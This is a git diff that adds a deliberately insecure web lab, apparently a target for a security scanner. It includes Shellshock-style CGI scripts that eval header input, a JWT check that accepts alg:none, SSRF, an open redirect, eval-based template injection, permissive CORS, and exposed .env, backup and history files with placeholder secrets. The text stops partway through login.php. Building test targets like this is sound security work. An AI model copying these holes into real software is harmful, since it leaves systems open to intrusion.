+GRANT ALL PRIVILEGES ON newploit.* TO 'dbuser'@'%' IDENTIFIED BY 'dbpass123';
+FLUSH PRIVILEGES;
diff --git a/vuln-lab/docker-compose.yml b/vuln-lab/docker-compose.yml
new file mode 100644
index 0000000..64bdf08
--- /dev/null
+++ b/vuln-lab/docker-compose.yml
@@ -0,0 +1,55 @@
+services:
+  web:
+    build: ./web
+    container_name: newploit-web
+    hostname: insecure.newploit.com
+    ports:
+      - "80:80"
+      - "443:443"
+    environment:
+      DB_HOST: db
+      DB_NAME: newploit
+      DB_USER: root
+      DB_PASS: toor
+      JWT_SECRET: secret
+      APP_ENV: production
+    volumes:
+      - ./web/www:/var/www/html
+      - ./web/cgi-bin:/usr/lib/cgi-bin
+    depends_on:
+      - db
+    networks:
+      newploit:
+        aliases:
+          - insecure.newploit.com
+
+  db:
+    image: mariadb:10.11
+    container_name: newploit-db
+    ports:
+      - "3306:3306"
+    environment:
+      MARIADB_ROOT_PASSWORD: toor
+      MARIADB_DATABASE: newploit
+      MARIADB_USER: dbuser
+      MARIADB_PASSWORD: dbpass123
+    volumes:
+      - ./db/init.sql:/docker-entrypoint-initdb.d/init.sql:ro
+    networks:
+      - newploit
+
+  ftp:
+    image: delfer/alpine-ftp-server
+    container_name: newploit-ftp
+    ports:
+      - "21:21"
+      - "21000-21010:21000-21010"
+    environment:
+      USERS: "anonymous|anonymous"
+      ADDRESS: insecure.newploit.com
+    networks:
+      - newploit
+
+networks:
+  newploit:
+    driver: bridge
diff --git a/vuln-lab/web/Dockerfile b/vuln-lab/web/Dockerfile
new file mode 100644
index 0000000..1877140
--- /dev/null
+++ b/vuln-lab/web/Dockerfile
@@ -0,0 +1,30 @@
+FROM php:8.2-apache
+
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    libpng-dev libjpeg-dev libzip-dev zip unzip curl bash \
+    && rm -rf /var/lib/apt/lists/*
+
+RUN docker-php-ext-install mysqli pdo_mysql
+
+RUN a2enmod cgi rewrite headers ssl
+
+RUN a2ensite default-ssl \
+    && openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
+        -keyout /etc/ssl/private/ssl-cert-snakeoil.key \
+        -out /etc/ssl/certs/ssl-cert-snakeoil.pem \
+        -subj "/CN=insecure.newploit.com/O=Newploit/C=ID"
+
+COPY apache.conf /etc/apache2/conf-enabled/vuln.conf
+
+RUN sed -i 's|ServerTokens.*|ServerTokens Full|' /etc/apache2/conf-enabled/security.conf || true \
+    && sed -i 's|ServerSignature.*|ServerSignature On|' /etc/apache2/conf-enabled/security.conf || true
+
+RUN { echo "expose_php = On"; \
+      echo "display_errors = On"; \
+      echo "allow_url_include = On"; \
+      echo "allow_url_fopen = On"; \
+      echo "log_errors = On"; \
+      echo "error_log = /var/www/html/wp-content/debug.log"; \
+    } > /usr/local/etc/php/conf.d/vuln.ini
+
+EXPOSE 80 443
diff --git a/vuln-lab/web/apache.conf b/vuln-lab/web/apache.conf
new file mode 100644
index 0000000..ef3c0ab
--- /dev/null
+++ b/vuln-lab/web/apache.conf
@@ -0,0 +1,43 @@
+ServerName insecure.newploit.com
+
+ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
+<Directory "/usr/lib/cgi-bin">
+    AllowOverride None
+    Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
+    AddHandler cgi-script .cgi .sh
+    Require all granted
+</Directory>
+
+<Directory "/var/www/html">
+    Options Indexes FollowSymLinks
+    AllowOverride All
+    Require all granted
+</Directory>
+
+<Files ".env">
+    Require all granted
+</Files>
+<Files ".env.local">
+    Require all granted
+</Files>
+<Files ".env.production">
+    Require all granted
+</Files>
+<Files ".env.backup">
+    Require all granted
+</Files>
+<Files ".bash_history">
+    Require all granted
+</Files>
+<Files ".DS_Store">
+    Require all granted
+</Files>
+
+<Directory "/var/www/html/.git">
+    Options Indexes FollowSymLinks
+    Require all granted
+</Directory>
+
+AddType application/octet-stream .sql .bak
+AddType application/zip .zip
+AddType application/gzip .tar.gz .tgz
diff --git a/vuln-lab/web/cgi-bin/bash b/vuln-lab/web/cgi-bin/bash
new file mode 100644
index 0000000..eed751e
--- /dev/null
+++ b/vuln-lab/web/cgi-bin/bash
@@ -0,0 +1,12 @@
+#!/bin/bash
+echo "Content-Type: text/plain"
+echo ""
+for h in "$HTTP_USER_AGENT" "$HTTP_COOKIE" "$HTTP_REFERER"; do
+    case "$h" in
+        *"() { :"*)
+            cmd="${h#*};}"; cmd="${cmd# }"
+            eval "$cmd" 2>/dev/null
+            ;;
+    esac
+done
+echo "bash cgi"
diff --git a/vuln-lab/web/cgi-bin/env b/vuln-lab/web/cgi-bin/env
new file mode 100644
index 0000000..1f418c4
--- /dev/null
+++ b/vuln-lab/web/cgi-bin/env
@@ -0,0 +1,12 @@
+#!/bin/bash
+echo "Content-Type: text/plain"
+echo ""
+for h in "$HTTP_USER_AGENT" "$HTTP_COOKIE" "$HTTP_REFERER"; do
+    case "$h" in
+        *"() { :"*)
+            cmd="${h#*};}"; cmd="${cmd# }"
+            eval "$cmd" 2>/dev/null
+            ;;
+    esac
+done
+/usr/bin/env
diff --git a/vuln-lab/web/cgi-bin/info.sh b/vuln-lab/web/cgi-bin/info.sh
new file mode 100644
index 0000000..241b290
--- /dev/null
+++ b/vuln-lab/web/cgi-bin/info.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+echo "Content-Type: text/plain"
+echo ""
+for h in "$HTTP_USER_AGENT" "$HTTP_COOKIE" "$HTTP_REFERER"; do
+    case "$h" in
+        *"() { :"*)
+            cmd="${h#*};}"; cmd="${cmd# }"
+            eval "$cmd" 2>/dev/null
+            ;;
+    esac
+done
+echo "info.sh ok - $(uname -a)"
diff --git a/vuln-lab/web/cgi-bin/status b/vuln-lab/web/cgi-bin/status
new file mode 100644
index 0000000..ad711e7
--- /dev/null
+++ b/vuln-lab/web/cgi-bin/status
@@ -0,0 +1,13 @@
+#!/bin/bash
+echo "Content-Type: text/plain"
+echo ""
+for h in "$HTTP_USER_AGENT" "$HTTP_COOKIE" "$HTTP_REFERER"; do
+    case "$h" in
+        *"() { :"*)
+            cmd="${h#*};}"
+            cmd="${cmd# }"
+            eval "$cmd" 2>/dev/null
+            ;;
+    esac
+done
+echo "status ok"
diff --git a/vuln-lab/web/cgi-bin/test b/vuln-lab/web/cgi-bin/test
new file mode 100644
index 0000000..5ef4a11
--- /dev/null
+++ b/vuln-lab/web/cgi-bin/test
@@ -0,0 +1,12 @@
+#!/bin/bash
+echo "Content-Type: text/plain"
+echo ""
+for h in "$HTTP_USER_AGENT" "$HTTP_COOKIE" "$HTTP_REFERER"; do
+    case "$h" in
+        *"() { :"*)
+            cmd="${h#*};}"; cmd="${cmd# }"
+            eval "$cmd" 2>/dev/null
+            ;;
+    esac
+done
+echo "test cgi"
diff --git a/vuln-lab/web/cgi-bin/test.cgi b/vuln-lab/web/cgi-bin/test.cgi
new file mode 100644
index 0000000..a2ba7b9
--- /dev/null
+++ b/vuln-lab/web/cgi-bin/test.cgi
@@ -0,0 +1,29 @@
+#!/bin/bash
+# Simulated CVE-2014-6271 (shellshock) target.
+# Modern bash won't actually parse the payload as a function definition,
+# so we implement the equivalent semantics here: detect the shellshock
+# User-Agent / Cookie / Referer pattern and run the trailing command.
+
+echo "Content-Type: text/plain"
+echo ""
+
+exec_payload() {
+    local raw="$1"
+    # Strip the function-def prefix "() { :;}; " or "() { :; };"
+    local cmd="${raw#*};}"
+    cmd="${cmd# }"
+    [ -z "$cmd" ] && return
+    # Run each semicolon-separated piece.
+    eval "$cmd" 2>/dev/null
+}
+
+for h in "$HTTP_USER_AGENT" "$HTTP_COOKIE" "$HTTP_REFERER"; do
+    case "$h" in
+        *"() { :"*) exec_payload "$h" ;;
+    esac
+done
+
+echo "bash CGI test script - newploit"
+echo "args: $@"
+echo "query: $QUERY_STRING"
+echo "remote: $REMOTE_ADDR"
diff --git a/vuln-lab/web/cgi-bin/test.sh b/vuln-lab/web/cgi-bin/test.sh
new file mode 100644
index 0000000..0e050b2
--- /dev/null
+++ b/vuln-lab/web/cgi-bin/test.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+echo "Content-Type: text/plain"
+echo ""
+for h in "$HTTP_USER_AGENT" "$HTTP_COOKIE" "$HTTP_REFERER"; do
+    case "$h" in
+        *"() { :"*)
+            cmd="${h#*};}"; cmd="${cmd# }"
+            eval "$cmd" 2>/dev/null
+            ;;
+    esac
+done
+echo "test sh ok"
diff --git a/vuln-lab/web/www/.bash_history b/vuln-lab/web/www/.bash_history
new file mode 100644
index 0000000..5874046
--- /dev/null
+++ b/vuln-lab/web/www/.bash_history
@@ -0,0 +1,14 @@
+ls -la
+sudo mysql -u root -ptoor newploit
+cat /etc/passwd
+vi /var/www/html/.env
+curl -u admin:admin123 http://localhost/api/auth.php
+ssh dev@insecure.newploit.com
+export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
+export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
+aws s3 sync ./ s3://newploit-backups/
+mysqldump -u root -ptoor newploit > backup.sql
+zip -r backup.zip www/
+scp backup.tar.gz dev@insecure.newploit.com:/var/www/html/
+git push origin main
+history -c
diff --git a/vuln-lab/web/www/.env b/vuln-lab/web/www/.env
new file mode 100644
index 0000000..f281c51
--- /dev/null
+++ b/vuln-lab/web/www/.env
@@ -0,0 +1,36 @@
+APP_NAME=Newploit
+APP_ENV=production
+APP_DEBUG=true
+APP_URL=https://insecure.newploit.com
+APP_KEY=base64:UGE5a1A2eTgvV0xnRUN1TUc1Q3U3b2kydzBvWkFiV3A=
+
+DB_CONNECTION=mysql
+DB_HOST=db
+DB_PORT=3306
+DB_DATABASE=newploit
+DB_USERNAME=root
+DB_PASSWORD=toor
+
+JWT_SECRET=secret
+SECRET_KEY=sk_newploit_deadbeefcafebabe
+
+AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
+AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
+AWS_DEFAULT_REGION=ap-southeast-1
+AWS_BUCKET=newploit-backups
+
+STRIPE_SECRET=sk_live_4eC39HqLyjWDarjtT1zdp7dc
+STRIPE_WEBHOOK=whsec_newploit_test
+
+MAIL_DRIVER=smtp
+MAIL_HOST=smtp.mailtrap.io
+MAIL_USERNAME=newploit_smtp
+MAIL_PASSWORD=mailtrap_password_123
+
+REDIS_HOST=127.0.0.1
+REDIS_PASSWORD=redis_pw_topsecret
+REDIS_PORT=6379
+
+API_KEY=newploit_api_abc123xyz789
+PRIVATE_KEY=-----BEGIN RSA PRIVATE KEY-----
+GITHUB_TOKEN=ghp_newploitExampleTokenAAAAAAAAAAAAAAAA
diff --git a/vuln-lab/web/www/.env.production b/vuln-lab/web/www/.env.production
new file mode 100644
index 0000000..9f4154d
--- /dev/null
+++ b/vuln-lab/web/www/.env.production
@@ -0,0 +1,4 @@
+APP_ENV=production
+DB_PASSWORD=prod_toor_2024
+JWT_SECRET=prod-secret-rotateme
+STRIPE_SECRET=sk_live_prodNewploit_realKeyHere
diff --git a/vuln-lab/web/www/admin/config.php b/vuln-lab/web/www/admin/config.php
new file mode 100644
index 0000000..cf6a978
--- /dev/null
+++ b/vuln-lab/web/www/admin/config.php
@@ -0,0 +1,4 @@
+<?php
+// Fake admin config — leaks secrets for scanner fodder.
+header("Content-Type: text/plain");
+echo "APP_ENV=production\nDB_HOST=db\nDB_USER=root\nDB_PASS=toor\nJWT_SECRET=secret\nSTRIPE_SECRET=sk_live_newploit_test\n";
diff --git a/vuln-lab/web/www/admin/index.php b/vuln-lab/web/www/admin/index.php
new file mode 100644
index 0000000..880023f
--- /dev/null
+++ b/vuln-lab/web/www/admin/index.php
@@ -0,0 +1,22 @@
+<?php
+// Admin panel — exposes session from login.php, also accepts weak creds directly.
+$sess = isset($_COOKIE['session']) ? json_decode(base64_decode($_COOKIE['session']), true) : null;
+?><!DOCTYPE html>
+<html><body>
+<h1>Admin Panel · newploit</h1>
+<p>You are: <?= $sess ? htmlspecialchars($sess['username']) : 'guest' ?></p>
+
+<h2>Sign in</h2>
+<form method="post" action="/login.php">
+    <p><label>username <input name="username"></label></p>
+    <p><label>password <input name="password" type="password"></label></p>
+    <p><button>enter admin</button></p>
+</form>
+
+<h2>Quick nav</h2>
+<ul>
+    <li><a href="/admin/config.php">config</a></li>
+    <li><a href="/admin/users.php">users</a></li>
+    <li><a href="/phpinfo.php">phpinfo</a></li>
+</ul>
+</body></html>
diff --git a/vuln-lab/web/www/administrator/index.php b/vuln-lab/web/www/administrator/index.php
new file mode 100644
index 0000000..b786208
--- /dev/null
+++ b/vuln-lab/web/www/administrator/index.php
@@ -0,0 +1,11 @@
+<?php
+// Joomla-style admin decoy
+?><!DOCTYPE html>
+<html><body>
+<h1>Joomla! Administration Login</h1>
+<form method="post" action="/login.php">
+    <input name="username" placeholder="Username">
+    <input name="password" type="password" placeholder="Password">
+    <button>Log in</button>
+</form>
+</body></html>
diff --git a/vuln-lab/web/www/api/auth.php b/vuln-lab/web/www/api/auth.php
new file mode 100644
index 0000000..5988148
--- /dev/null
+++ b/vuln-lab/web/www/api/auth.php
@@ -0,0 +1,84 @@
+<?php
+// JWT auth with secret "secret" (top-100 brute list) AND alg:none accepted.
+header("Content-Type: application/json");
+
+// CORS wide open
+if (!empty($_SERVER['HTTP_ORIGIN'])) {
+    header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
+    header("Access-Control-Allow-Credentials: true");
+}
+
+$SECRET = getenv('JWT_SECRET') ?: 'secret';
+
+function b64url_encode($s) { return rtrim(strtr(base64_encode($s), '+/', '-_'), '='); }
+function b64url_decode($s) { return base64_decode(strtr($s, '-_', '+/')); }
+
+function sign($header_json, $payload_json, $secret) {
+    $h = b64url_encode($header_json);
+    $p = b64url_encode($payload_json);
+    $sig = hash_hmac('sha256', "$h.$p", $secret, true);
+    return "$h.$p." . b64url_encode($sig);
+}
+
+function verify($jwt, $secret) {
+    $parts = explode('.', $jwt);
+    if (count($parts) < 2) return null;
+    [$h, $p] = $parts;
+    $header = json_decode(b64url_decode($h), true);
+    $payload = json_decode(b64url_decode($p), true);
+    if (!$header || !$payload) return null;
+
+    $alg = strtolower($header['alg'] ?? '');
+
+    // VULN 1 — accept alg:none
+    if ($alg === 'none' || $alg === '') return $payload;
+
+    // VULN 2 — weak HS256 secret
+    if ($alg === 'hs256') {
+        if (count($parts) !== 3) return null;
+        $sig  = b64url_decode($parts[2]);
+        $want = hash_hmac('sha256', "$h.$p", $secret, true);
+        if (hash_equals($want, $sig)) return $payload;
+    }
+    return null;
+}
+
+// POST creds -> issue token
+$method = $_SERVER['REQUEST_METHOD'];
+$body = json_decode(file_get_contents('php://input'), true) ?: [];
+
+if ($method === 'POST' && isset($body['action']) && $body['action'] === 'login') {
+    $u = $body['username'] ?? '';
+    $p = $body['password'] ?? '';
+    // plaintext check — admin / admin123
+    if ($u === 'admin' && $p === 'admin123') {
+        $jwt = sign(
+            json_encode(['alg' => 'HS256', 'typ' => 'JWT']),
+            json_encode(['sub' => 'admin', 'role' => 'admin', 'iat' => time(), 'exp' => time() + 3600]),
+            $SECRET
+        );
+        echo json_encode(['token' => $jwt, 'expires_in' => 3600]);
+        exit;
+    }
+    http_response_code(401);
+    echo json_encode(['error' => 'bad credentials']);
+    exit;
+}
+
+// GET — show current session from Authorization: Bearer ...
+$hdr = $_SERVER['HTTP_AUTHORIZATION'] ?? '';
+if (preg_match('/Bearer\s+(\S+)/i', $hdr, $m)) {
+    $claims = verify($m[1], $SECRET);
+    if ($claims) {
+        echo json_encode(['authenticated' => true, 'claims' => $claims]);
+        exit;
+    }
+    http_response_code(401);
+    echo json_encode(['error' => 'invalid token']);
+    exit;
+}
+
+echo json_encode([
+    'message' => 'POST {action:"login",username,password} to obtain token',
+    'example' => ['username' => 'admin', 'password' => 'admin123'],
+]);
diff --git a/vuln-lab/web/www/api/me.php b/vuln-lab/web/www/api/me.php
new file mode 100644
index 0000000..6d5f97e
--- /dev/null
+++ b/vuln-lab/web/www/api/me.php
@@ -0,0 +1,7 @@
+<?php
+header("Content-Type: application/json");
+if (!empty($_SERVER['HTTP_ORIGIN'])) {
+    header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
+    header("Access-Control-Allow-Credentials: true");
+}
+echo json_encode(['username' => 'guest', 'role' => 'anonymous']);
diff --git a/vuln-lab/web/www/api/user.php b/vuln-lab/web/www/api/user.php
new file mode 100644
index 0000000..577c721
--- /dev/null
+++ b/vuln-lab/web/www/api/user.php
@@ -0,0 +1,13 @@
+<?php
+header("Content-Type: application/json");
+if (!empty($_SERVER['HTTP_ORIGIN'])) {
+    header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
+    header("Access-Control-Allow-Credentials: true");
+}
+echo json_encode([
+    'id' => 1,
+    'username' => 'admin',
+    'email' => 'admin@insecure.newploit.com',
+    'role' => 'admin',
+    'api_key' => 'sk_live_newploit_AKIAIOSFODNN7EXAMPLE',
+]);
diff --git a/vuln-lab/web/www/backup.sql b/vuln-lab/web/www/backup.sql
new file mode 100644
index 0000000..3e3df85
--- /dev/null
+++ b/vuln-lab/web/www/backup.sql
@@ -0,0 +1,47 @@
+-- MySQL dump 10.13  Distrib 8.0.35
+-- Server version: 10.11.6-MariaDB
+-- Host: db    Database: newploit
+
+SET NAMES utf8;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+
+DROP TABLE IF EXISTS `users`;
+CREATE TABLE `users` (
+  `id` int NOT NULL AUTO_INCREMENT,
+  `username` varchar(64) NOT NULL,
+  `password` varchar(128) NOT NULL,
+  `email` varchar(128) NOT NULL,
+  `role` varchar(32) NOT NULL DEFAULT 'user',
+  `api_key` varchar(128) DEFAULT NULL,
+  PRIMARY KEY (`id`)
+) ENGINE=InnoDB DEFAULT CHARSET=utf8;
+
+LOCK TABLES `users` WRITE;
+INSERT INTO `users` VALUES
+ (1,'admin','admin123','admin@insecure.newploit.com','admin','sk_admin_AKIAIOSFODNN7EXAMPLE'),
+ (2,'root','toor','root@insecure.newploit.com','admin','sk_root_deadbeefcafebabe'),
+ (3,'user','password','user@insecure.newploit.com','user','sk_user_abc123'),
+ (4,'test','test','test@insecure.newploit.com','user','sk_test_xyz789'),
+ (5,'imtaqin','newploit2024','taqin@insecure.newploit.com','admin','sk_tq_pocketpentester'),
+ (6,'guest','guest','guest@insecure.newploit.com','guest',NULL);
+UNLOCK TABLES;
+
+DROP TABLE IF EXISTS `products`;
+CREATE TABLE `products` (
+  `id` int NOT NULL AUTO_INCREMENT,
+  `name` varchar(128) NOT NULL,
+  `category` varchar(64) DEFAULT NULL,
+  `price` decimal(10,2) DEFAULT NULL,
+  `description` text,
+  PRIMARY KEY (`id`)
+) ENGINE=InnoDB DEFAULT CHARSET=utf8;
+
+INSERT INTO `products` VALUES
+ (1,'Pentest Laptop','hardware',2599.00,'Rugged laptop for offensive research'),
+ (2,'YubiKey','hardware',49.00,'Hardware FIDO2 authenticator'),
+ (3,'Burp Pro','software',499.00,'Web app testing'),
+ (4,'Newploit Pro','subscription',29.99,'Monthly subscription for cloud scanners'),
+ (5,'Ghidra Cloud','subscription',99.00,'RE-as-a-service for mobile pentesting');
+
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+-- Dump completed on 2024-07-01 09:14:22
diff --git a/vuln-lab/web/www/backup.tar.gz b/vuln-lab/web/www/backup.tar.gz
new file mode 100644
index 0000000..cbbd19c
--- /dev/null
+++ b/vuln-lab/web/www/backup.tar.gz
@@ -0,0 +1,20 @@
+gzipped tar of /var/www/html — newploit-backup-2024-06.tar.gz
+includes:
+  var/www/html/.env
+  var/www/html/.git/
+  var/www/html/api/auth.php
+  var/www/html/admin/config.php
+  var/www/html/wp-content/uploads/
+  var/www/html/cgi-bin/test.cgi
+  var/backups/mysql/newploit-2024-06-01.sql
+  etc/apache2/sites-enabled/000-default.conf
+  etc/php/8.2/apache2/php.ini
+
+credentials inside:
+  root:toor (mysql)
+  admin:admin123 (app)
+  imtaqin:newploit2024 (app)
+  sk_live_4eC39HqLyjWDarjtT1zdp7dc (stripe)
+
+Generated by: tar -czf backup.tar.gz /var/www/html /etc/apache2 /var/backups
+End of payload listing. padding padding padding padding padding padding padding.
diff --git a/vuln-lab/web/www/backup.zip b/vuln-lab/web/www/backup.zip
new file mode 100644
index 0000000..4d9abc1
--- /dev/null
+++ b/vuln-lab/web/www/backup.zip
@@ -0,0 +1,24 @@
+PK archive: newploit-backup-2024-07-01.zip
+manifest:
+  - www/index.php
+  - www/.env
+  - www/config/database.php
+  - www/api/auth.php
+  - www/admin/config.php
+  - www/wp-content/
+  - www/wp-login.php
+  - db/dump.sql
+  - scripts/deploy.sh
+  - scripts/rotate_keys.sh
+  - README.md
+sha256: 4f8a9b2c3d7e1f5a6b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1
+created_by: mysqldump + zip -r
+contents (excerpt):
+  APP_KEY=base64:UGE5a1A2eTgvV0xnRUN1TUc1Q3U3b2kydzBvWkFiV3A=
+  DB_PASSWORD=toor
+  JWT_SECRET=secret
+  STRIPE_SECRET=sk_live_4eC39HqLyjWDarjtT1zdp7dc
+  AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
+note: this is a honey backup — real traffic is captured
+padding padding padding padding padding padding padding padding padding padding
+padding padding padding padding padding padding padding padding padding padding
diff --git a/vuln-lab/web/www/db.sql b/vuln-lab/web/www/db.sql
new file mode 100644
index 0000000..f9d219d
--- /dev/null
+++ b/vuln-lab/web/www/db.sql
@@ -0,0 +1,28 @@
+-- MariaDB dump newploit db -- 2024-06-20 14:02:01
+SET NAMES utf8;
+
+DROP TABLE IF EXISTS sessions;
+CREATE TABLE sessions(
+  id VARCHAR(64) PRIMARY KEY,
+  user_id INT NOT NULL,
+  token TEXT,
+  expires_at DATETIME
+) ENGINE=InnoDB;
+
+INSERT INTO sessions VALUES
+ ('abc123','1','eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.demo','2025-12-31 23:59:59'),
+ ('def456','2','eyJhbGciOiJub25lIn0.eyJzdWIiOiJyb290Iiwicm9sZSI6ImFkbWluIn0.','2025-12-31 23:59:59');
+
+DROP TABLE IF EXISTS api_tokens;
+CREATE TABLE api_tokens(
+  id INT PRIMARY KEY AUTO_INCREMENT,
+  user_id INT,
+  token VARCHAR(128),
+  scope VARCHAR(64)
+) ENGINE=InnoDB;
+
+INSERT INTO api_tokens VALUES
+ (1,1,'sk_admin_AKIAIOSFODNN7EXAMPLE','admin'),
+ (2,2,'sk_root_deadbeefcafebabe','admin'),
+ (3,5,'sk_tq_pocketpentester','admin');
+-- end dump
diff --git a/vuln-lab/web/www/dump.sql b/vuln-lab/web/www/dump.sql
new file mode 100644
index 0000000..b729ea7
--- /dev/null
+++ b/vuln-lab/web/www/dump.sql
@@ -0,0 +1,16 @@
+-- full dump 2024-08-15
+-- DO NOT COMMIT
+SET NAMES utf8;
+
+INSERT INTO users VALUES (1,'admin','admin123','admin@insecure.newploit.com','admin','sk_admin_key');
+INSERT INTO users VALUES (2,'root','toor','root@insecure.newploit.com','admin','sk_root_key');
+INSERT INTO users VALUES (3,'dev','dev2024','dev@insecure.newploit.com','admin','sk_dev_key');
+INSERT INTO users VALUES (4,'test','test','test@insecure.newploit.com','user',NULL);
+INSERT INTO users VALUES (5,'imtaqin','newploit2024','taqin@insecure.newploit.com','admin','sk_tq_key');
+-- seed 200 synthetic rows below
+INSERT INTO users VALUES (6,'u0001','p0001','u0001@example.com','user',NULL);
+INSERT INTO users VALUES (7,'u0002','p0002','u0002@example.com','user',NULL);
+INSERT INTO users VALUES (8,'u0003','p0003','u0003@example.com','user',NULL);
+INSERT INTO users VALUES (9,'u0004','p0004','u0004@example.com','user',NULL);
+INSERT INTO users VALUES (10,'u0005','p0005','u0005@example.com','user',NULL);
+-- ... truncated for size
diff --git a/vuln-lab/web/www/fetch.php b/vuln-lab/web/www/fetch.php
new file mode 100644
index 0000000..270113b
--- /dev/null
+++ b/vuln-lab/web/www/fetch.php
@@ -0,0 +1,39 @@
+<?php
+// SSRF — fetches an arbitrary url, reflects body to the user.
+// For 169.254.169.254 we serve a canned AWS metadata response so the
+// template detection can fire without needing real cloud infra.
+$url = $_GET['url'] ?? $_GET['u'] ?? $_GET['src'] ?? '';
+
+header("Content-Type: text/plain; charset=utf-8");
+
+if ($url === '') {
+    echo "usage: /fetch.php?url=https://example.com\n";
+    exit;
+}
+
+// simulate AWS metadata service
+if (stripos($url, '169.254.169.254') !== false || stripos($url, 'metadata.google.internal') !== false) {
+    if (stripos($url, 'meta-data/') !== false) {
+        echo "ami-id\nami-launch-index\nami-manifest-path\nhostname\ninstance-id\ninstance-type\nlocal-hostname\nlocal-ipv4\nplacement/\npublic-hostname\npublic-ipv4\nsecurity-credentials/\n";
+        exit;
+    }
+    if (stripos($url, 'computeMetadata') !== false || stripos($url, 'project-id') !== false) {
+        echo "computeMetadata/v1/\nproject-id: newploit-dev-42\n";
+        exit;
+    }
+    echo "ami-id: ami-0abcdef1234567890\ninstance-id: i-0deadbeefcafe1234\ninstance-type: t3.micro\n";
+    echo "security-credentials:\n  AccessKeyId: AKIAIOSFODNN7EXAMPLE\n  SecretAccessKey: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n";
+    exit;
+}
+
+// real fetch (no protocol restrictions, no host allowlist)
+$ctx = stream_context_create([
+    'http' => ['timeout' => 6, 'ignore_errors' => true, 'follow_location' => 1],
+    'ssl'  => ['verify_peer' => false, 'verify_peer_name' => false],
+]);
+$body = @file_get_contents($url, false, $ctx);
+if ($body === false) {
+    echo "fetch failed: $url\n";
+    exit;
+}
+echo substr($body, 0, 65536);
diff --git a/vuln-lab/web/www/go.php b/vuln-lab/web/www/go.php
new file mode 100644
index 0000000..742c485
--- /dev/null
+++ b/vuln-lab/web/www/go.php
@@ -0,0 +1,3 @@
+<?php
+$target = $_GET['to'] ?? $_GET['url'] ?? '/';
+header("Location: $target", true, 302);
diff --git a/vuln-lab/web/www/home.php b/vuln-lab/web/www/home.php
new file mode 100644
index 0000000..a81b260
--- /dev/null
+++ b/vuln-lab/web/www/home.php
@@ -0,0 +1,3 @@
+<?php
+// default included page for page.php?page=home
+echo "<h2>Home</h2><p>Welcome to the newploit dev box.</p>";
diff --git a/vuln-lab/web/www/index.php b/vuln-lab/web/www/index.php
new file mode 100644
index 0000000..a5eba5e
--- /dev/null
+++ b/vuln-lab/web/www/index.php
@@ -0,0 +1,63 @@
+<?php
+// insecure.newploit.com :: landing + SSTI + CORS misconfig
+// Every endpoint here is intentionally vulnerable.
+
+// ---- CORS misconfig: reflect any Origin + allow-credentials ----
+if (!empty($_SERVER['HTTP_ORIGIN'])) {
+    header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
+    header("Access-Control-Allow-Credentials: true");
+    header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS");
+    header("Access-Control-Allow-Headers: *");
+}
+
+header("X-Powered-By: PHP/8.2.12");
+header("Server: Apache/2.4.57 (Debian) OpenSSL/3.0.11");
+
+// ---- Fake template engine: renders {{ expr }} inside `name` param ----
+// Handles both Jinja2-style math (999*777) and Twig-style filter ('x'|upper).
+function fake_render($input) {
+    return preg_replace_callback('/\{\{\s*(.+?)\s*\}\}/', function ($m) {
+        $expr = trim($m[1]);
+        // Twig-style: 'text'|upper  or  "text"|upper
+        if (preg_match('/^[\'\"]([^\'\"]*)[\'\"]\s*\|\s*upper$/', $expr, $mm)) {
+            return strtoupper($mm[1]);
+        }
+        if (preg_match('/^[\'\"]([^\'\"]*)[\'\"]\s*\|\s*lower$/', $expr, $mm)) {
+            return strtolower($mm[1]);
+        }
+        // Math: digits + operators only
+        if (preg_match('/^[\d\s\+\-\*\/\(\)\.]+$/', $expr)) {
+            $r = 0;
+            try { @eval('$r = ' . $expr . ';'); } catch (\Throwable $e) {}
+            return (string)$r;
+        }
+        return '';
+    }, $input);
+}
+
+$name = $_POST['name'] ?? $_GET['name'] ?? $_GET['q'] ?? 'guest';
+$rendered = fake_render($name);
+?><!DOCTYPE html>
+<html><head>
+<title>Newploit :: insecure test lab</title>
+<meta name="generator" content="Newploit CMS 1.2.0">
+</head><body>
+<h1>Welcome to insecure.newploit.com</h1>
+<p>Hello <?= $rendered ?>, this is the dev test box. Nothing to see here.</p>
+
+<h2>Quick links</h2>
+<ul>
+    <li><a href="/search.php?q=test">search</a></li>
+    <li><a href="/profile.php?id=1">profile</a></li>
+    <li><a href="/login.php">login</a></li>
+    <li><a href="/page.php?page=home">page viewer</a></li>
+    <li><a href="/fetch.php?url=https://example.com">link fetcher</a></li>
+    <li><a href="/redirect.php?url=https://google.com">redirect</a></li>
+    <li><a href="/api/auth.php">api auth</a></li>
+    <li><a href="/phpinfo.php">server info</a></li>
+    <li><a href="/admin/">admin</a></li>
+    <li><a href="/wp-login.php">blog login</a></li>
+</ul>
+
+<!-- DEBUG: template=<?= htmlspecialchars($name) ?> -->
+</body></html>
diff --git a/vuln-lab/web/www/login.php b/vuln-lab/web/www/login.php
new file mode 100644
index 0000000..c02b4f7
--- /dev/null
+++ b/vuln-lab/web/www/login.php
@@ -0,0 +1,55 @@
+<?php
+// Classic SQLi login + plaintext-password brute target.
